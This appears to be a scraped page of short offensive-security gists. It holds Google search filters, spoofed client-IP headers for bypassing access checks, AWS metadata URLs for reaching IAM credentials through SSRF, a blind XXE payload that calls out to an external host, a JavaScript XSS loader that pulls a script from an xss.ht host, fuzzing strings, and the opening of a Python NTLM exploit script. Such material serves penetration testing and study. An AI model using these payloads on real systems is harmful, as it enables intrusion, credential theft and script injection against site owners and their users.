Filter | Description | Example |
---|---|---|
allintext | Searches for occurrences of all the keywords given. | allintext:"keyword" |
intext | Searches for the occurrences of keywords all at once or one at a time. | intext:"keyword" |
inurl | Searches for a URL matching one of the keywords. | inurl:"keyword" |
allinurl | Searches for a URL matching all the keywords in the query. | allinurl:"keyword" |
intitle | Searches for occurrences of keywords in title all or one. | intitle:"keyword" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CACHE_INFO: 127.0.0.1 | |
CF_CONNECTING_IP: 127.0.0.1 | |
CF-Connecting-IP: 127.0.0.1 | |
CLIENT_IP: 127.0.0.1 | |
Client-IP: 127.0.0.1 | |
COMING_FROM: 127.0.0.1 | |
CONNECT_VIA_IP: 127.0.0.1 | |
FORWARD_FOR: 127.0.0.1 | |
FORWARD-FOR: 127.0.0.1 | |
FORWARDED_FOR_IP: 127.0.0.1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## AWS | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
` | |
~/ | |
~ | |
×™× | |
___ | |
__ | |
_ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//Regular Expressions List | |
//Short Tutorial | |
\ // the escape character - used to find an instance of a metacharacter like a period, brackets, etc. | |
. // match any character except newline | |
x // match any instance of x | |
^x // match any character except x | |
[x] // match any instance of x in the bracketed range - [abxyz] will match any instance of a, b, x, y, or z | |
| // an OR operator - [x|y] will match an instance of x or y |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
.php | |
.html | |
.txt | |
.htm | |
.aspx | |
.asp | |
.js | |
.css | |
.pgsql.txt | |
.mysql.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import time | |
import sys | |
from base64 import b64encode | |
from requests_ntlm2 import HttpNtlmAuth | |
from urllib3.exceptions import InsecureRequestWarning | |
from urllib import quote_plus | |
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
NewerOlder